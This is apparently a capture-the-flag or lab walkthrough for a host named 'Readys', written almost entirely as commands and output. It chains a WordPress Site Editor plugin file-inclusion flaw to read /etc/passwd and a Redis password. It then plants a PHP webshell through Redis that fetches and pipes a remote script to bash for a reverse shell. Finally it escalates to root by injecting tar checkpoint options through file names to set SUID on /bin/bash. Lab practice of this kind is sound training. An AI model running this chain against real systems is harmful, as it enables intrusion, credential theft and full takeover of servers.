$ sudo nmap -sCV -p- -v -Pn --open 192.168.228.166 > Readys.txt
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Readys &#8211; Just another WordPress site
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.7.2
6379/tcp open  redis   Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

$ wpscan --url 192.168.228.166 -e ap,at,u --plugins-detection aggressive
[+] site-editor  version: 1.1.1
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion             | php/webapps/44340.txt
# Follow 44340.txt. Found LFI
http://192.168.228.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
redis:x:107:114::/var/lib/redis:/usr/sbin/nologin

view-source:http://192.168.228.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf
requirepass Ready4Redis?

nc -nv 192.168.228.166 6379 or redis-cli -h 192.168.228.116
auth Ready4Redis?
config set dir /opt/redis-files # only this directory works
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save

config set dir /opt/redis-files
config set dbfilename rev.php
set test '<?php system("curl http://192.168.45.154/shell.sh | bash"); ?>'
save

# Use LFI to trigger the reverse shell

$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.154] from (UNKNOWN) [192.168.228.166] 41806
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(alice) gid=1000(alice) groups=1000(alice)

LinEnum.sh found crontab
[-] Crontab contents:
*/3 * * * * root /usr/local/bin/backup.sh

cat /usr/local/bin/backup.sh
#!/bin/bash

cd /var/www/html
if [ $(find . -type f -mmin -3 | wc -l) -gt 0 ]; then
tar -cf /opt/backups/website.tar *
fi

touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=sh bash.sh"
alice@readys:/var/www/html$ echo '#!/bin/bash' > bash.sh
alice@readys:/var/www/html$ echo 'chmod +s /bin/bash' >> bash.sh

ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash

alice@readys:/var/www/html$ /bin/bash -p
bash-5.0# id
uid=1000(alice) gid=1000(alice) euid=0(root) egid=0(root) groups=0(root),1000(alice)

